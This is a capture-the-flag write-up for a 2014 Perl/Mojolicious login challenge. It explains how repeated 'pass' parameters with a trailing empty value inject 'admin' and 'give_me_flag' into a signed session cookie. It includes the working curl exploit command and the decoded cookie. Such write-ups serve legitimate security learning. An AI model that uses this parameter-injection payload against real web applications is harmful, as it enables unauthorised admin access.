You can’t guess LOGINPAGE_SECRET absolutely, it’s not answer. So, maybe there are some vulnerability and you got an admin and flag.

I wrote this web app on Oct. 28 2014. Perl is awesome language and I love it :)

Here we have a web app based on the mojolicious framework. We need to get a cookie with a valid signature that has the properties “admin” and “give_me_flag” set to 1. Unfortunately the code sets the latter always to 0 :(

We found soon this perl vulnerability and indeed it revealed to be useful. By exploiting the following snippet we could inject arbitrary fields in the session:

$self->session->{user} = {
    name         => $self->param('name'),
    pass         => $self->param('pass'),
    give_me_flag => 0,
    admin        => $is_admin,
};

The problem is that “give_me_flag” and “admin” are set after “name” and “pass”, so using payloads like “name=fox1&pass=pass&pass=give_me_flag&pass=1” as shown in the blogpost will have no effect. The trick is to use a trailing argument name without value so all the remaining key/value pairs will be misaligned.

The final exploit is the following:

$ curl -vvv 'http://loginpage.adctf2014.katsudon.org/login' --data 'name=fox1&pass=pass&pass=give_me_flag&pass=1&pass=admin&pass=1&pass=' 2>&1 | grep Set-Cookie
< Set-Cookie: mojolicious=eyJleHBpcmVzIjoxNDE5OTQyMjg5LCJ1c2VyIjp7Im5hbWUiOiJmb3gxIiwiMCI6ImFkbWluIiwiYWRtaW4iOiIxIiwiZ2l2ZV9tZV9mbGFnIjoiMSIsInBhc3MiOiJwYXNzIiwiMSI6bnVsbCwiIjoiZ2l2ZV9tZV9mbGFnIn19--4bcd2c3b6c39a3460aeaca9aaafc111b5ce2c811; expires=Tue, 30 Dec 2014 12:24:49 GMT; path=/; HttpOnly

…and as we can see the cookie contains interesting data :D

$ echo 'eyJleHBpcmVzIjoxNDE5OTQyMjMwLCJ1c2VyIjp7Im5hbWUiOiJmb3gxIiwiMCI6ImFkbWluIiwiYWRtaW4iOiIxIiwicGFzcyI6InBhc3MiLCJnaXZlX21lX2ZsYWciOiIxIiwiMSI6bnVsbCwiIjoiZ2l2ZV9tZV9mbGFnIn19' | base64 -d
{"expires":1419942230,"user":{"name":"fox1","0":"admin","admin":"1","pass":"pass","give_me_flag":"1","1":null,"":"give_me_flag"}}

So we can just use that cookie to login and get the flag!

fox